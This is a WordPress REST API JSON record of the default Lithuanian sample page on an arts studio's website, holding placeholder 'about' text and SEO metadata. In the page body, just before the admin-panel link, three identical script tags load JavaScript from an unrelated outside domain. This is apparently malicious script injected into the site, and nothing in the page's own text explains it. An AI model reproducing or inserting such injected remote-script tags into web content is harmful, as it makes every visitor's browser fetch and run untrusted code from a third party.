{"id":2,"date":"2016-09-06T03:28:41","date_gmt":"2016-09-06T05:28:41","guid":{"rendered":"http:\/\/www.menustudija.lt\/?page_id=2"},"modified":"2016-09-06T03:28:41","modified_gmt":"2016-09-06T05:28:41","slug":"puslapio-pavyzdys","status":"publish","type":"page","link":"http:\/\/www.menustudija.lt\/lt\/puslapio-pavyzdys\/","title":{"rendered":"Puslapio pavyzdys"},"content":{"rendered":"<p>Tai testinis puslapis. Puslapis skiriasi nuo \u012fra\u0161o, nes jis visuomet liks toje pa\u010dioje vietoje J\u016bs\u0173 tinklalapyje, bei daugumoje tem\u0173 bus rodomas kaip meniu punktas. Da\u017eniausiai tinklalapiai pradedami kurti nuo puslapio &#8222;Apie&#8221;, kuriame tinklalapis pristatomas jo lankytojams. Pavyzd\u017eiui, tokiame puslapyje gali b\u016bti para\u0161yta:<\/p>\n<blockquote><p>Sveiki! Dienomis a\u0161 dirbu dvira\u010di\u0173 kurjeriu, vakarais bandau siekti aktoriaus karjeros, o \u010dia yra mano tinklara\u0161tis. A\u0161 gyvenu Vilniuje, turiu puik\u0173 \u0161un\u012f vardu Rudis, ir labai m\u0117gstu vaisi\u0173 kokteilius (bei b\u016bti u\u017ekluptas lietaus).<\/p><\/blockquote>\n<p>&#8230;arba \u0161is puslapis gali b\u016bti ir rimtesnis:<\/p>\n<blockquote><p>UAB &#8222;\u012eranki\u0173 Fabrikas&#8221; buvo \u012fkurta dar 1971-aisiais, ir nuo pat tada iki \u0161iol nepavargdami gamina kokybi\u0161kus \u012frankius. \u012emon\u0117 \u012fsik\u016brusi Kaune, joje dirba daugiau nei 2000 specialist\u0173. UAB &#8222;\u012eranki\u0173 Fabrikas&#8221; aktyviai dalyvauja bendruomen\u0117s veikloje ir nuolat prisideda prie miestie\u010di\u0173 gyvenimo gerinimo.<\/p><\/blockquote>\n<p>Kadangi \u0161is tinklalapis yra k\u0105 tik sukurtas, mes rekomenduojame pirmiausia apsilankyti savo <script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><a href=\"http:\/\/www.menustudija.lt\/wp-admin\/\">administravimo skydelyje<\/a>, i\u0161trinti \u0161\u012f testin\u012f puslap\u012f ir sukurti naujus su savo norimu turiniu. S\u0117km\u0117s!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Tai testinis puslapis. Puslapis skiriasi nuo \u012fra\u0161o, nes jis visuomet liks toje pa\u010dioje vietoje J\u016bs\u0173 tinklalapyje, bei daugumoje tem\u0173 bus rodomas kaip meniu punktas. Da\u017eniausiai tinklalapiai pradedami kurti nuo puslapio &#8222;Apie&#8221;, kuriame tinklalapis pristatomas jo lankytojams. Pavyzd\u017eiui, tokiame puslapyje gali b\u016bti para\u0161yta: Sveiki! Dienomis a\u0161 dirbu dvira\u010di\u0173 kurjeriu, vakarais bandau siekti aktoriaus karjeros, o \u010dia &hellip; <\/p>\n","protected":false},"author":6,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-2","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Puslapio pavyzdys - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/www.menustudija.lt\/lt\/puslapio-pavyzdys\/\" \/>\n<meta property=\"og:locale\" content=\"lt_LT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Puslapio pavyzdys - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\" \/>\n<meta property=\"og:description\" content=\"Tai testinis puslapis. Puslapis skiriasi nuo \u012fra\u0161o, nes jis visuomet liks toje pa\u010dioje vietoje J\u016bs\u0173 tinklalapyje, bei daugumoje tem\u0173 bus rodomas kaip meniu punktas. Da\u017eniausiai tinklalapiai pradedami kurti nuo puslapio &#8222;Apie&#8221;, kuriame tinklalapis pristatomas jo lankytojams. Pavyzd\u017eiui, tokiame puslapyje gali b\u016bti para\u0161yta: Sveiki! Dienomis a\u0161 dirbu dvira\u010di\u0173 kurjeriu, vakarais bandau siekti aktoriaus karjeros, o \u010dia &hellip;\" \/>\n<meta property=\"og:url\" content=\"http:\/\/www.menustudija.lt\/lt\/puslapio-pavyzdys\/\" \/>\n<meta property=\"og:site_name\" content=\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minut\u0117\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/puslapio-pavyzdys\/\",\"url\":\"http:\/\/www.menustudija.lt\/lt\/puslapio-pavyzdys\/\",\"name\":\"Puslapio pavyzdys - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\",\"isPartOf\":{\"@id\":\"https:\/\/www.menustudija.lt\/lt\/#website\"},\"datePublished\":\"2016-09-06T05:28:41+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/puslapio-pavyzdys\/#breadcrumb\"},\"inLanguage\":\"lt-LT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/www.menustudija.lt\/lt\/puslapio-pavyzdys\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/puslapio-pavyzdys\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"http:\/\/www.menustudija.lt\/lt\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Puslapio pavyzdys\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.menustudija.lt\/lt\/#website\",\"url\":\"https:\/\/www.menustudija.lt\/lt\/\",\"name\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\",\"description\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija - mintims, sielai, k\u016bnui\",\"publisher\":{\"@id\":\"https:\/\/www.menustudija.lt\/lt\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.menustudija.lt\/lt\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"lt-LT\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.menustudija.lt\/lt\/#organization\",\"name\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\",\"url\":\"https:\/\/www.menustudija.lt\/lt\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"lt-LT\",\"@id\":\"https:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/\",\"url\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg\",\"contentUrl\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg\",\"width\":2560,\"height\":768,\"caption\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\"},\"image\":{\"@id\":\"https:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Puslapio pavyzdys - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/www.menustudija.lt\/lt\/puslapio-pavyzdys\/","og_locale":"lt_LT","og_type":"article","og_title":"Puslapio pavyzdys - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","og_description":"Tai testinis puslapis. Puslapis skiriasi nuo \u012fra\u0161o, nes jis visuomet liks toje pa\u010dioje vietoje J\u016bs\u0173 tinklalapyje, bei daugumoje tem\u0173 bus rodomas kaip meniu punktas. Da\u017eniausiai tinklalapiai pradedami kurti nuo puslapio &#8222;Apie&#8221;, kuriame tinklalapis pristatomas jo lankytojams. Pavyzd\u017eiui, tokiame puslapyje gali b\u016bti para\u0161yta: Sveiki! Dienomis a\u0161 dirbu dvira\u010di\u0173 kurjeriu, vakarais bandau siekti aktoriaus karjeros, o \u010dia &hellip;","og_url":"http:\/\/www.menustudija.lt\/lt\/puslapio-pavyzdys\/","og_site_name":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"1 minut\u0117"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"http:\/\/www.menustudija.lt\/lt\/puslapio-pavyzdys\/","url":"http:\/\/www.menustudija.lt\/lt\/puslapio-pavyzdys\/","name":"Puslapio pavyzdys - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","isPartOf":{"@id":"https:\/\/www.menustudija.lt\/lt\/#website"},"datePublished":"2016-09-06T05:28:41+00:00","breadcrumb":{"@id":"http:\/\/www.menustudija.lt\/lt\/puslapio-pavyzdys\/#breadcrumb"},"inLanguage":"lt-LT","potentialAction":[{"@type":"ReadAction","target":["http:\/\/www.menustudija.lt\/lt\/puslapio-pavyzdys\/"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/www.menustudija.lt\/lt\/puslapio-pavyzdys\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"http:\/\/www.menustudija.lt\/lt\/"},{"@type":"ListItem","position":2,"name":"Puslapio pavyzdys"}]},{"@type":"WebSite","@id":"https:\/\/www.menustudija.lt\/lt\/#website","url":"https:\/\/www.menustudija.lt\/lt\/","name":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","description":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija - mintims, sielai, k\u016bnui","publisher":{"@id":"https:\/\/www.menustudija.lt\/lt\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.menustudija.lt\/lt\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"lt-LT"},{"@type":"Organization","@id":"https:\/\/www.menustudija.lt\/lt\/#organization","name":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","url":"https:\/\/www.menustudija.lt\/lt\/","logo":{"@type":"ImageObject","inLanguage":"lt-LT","@id":"https:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/","url":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg","contentUrl":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg","width":2560,"height":768,"caption":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija"},"image":{"@id":"https:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/pages\/2","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/comments?post=2"}],"version-history":[{"count":0,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/pages\/2\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/media?parent=2"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}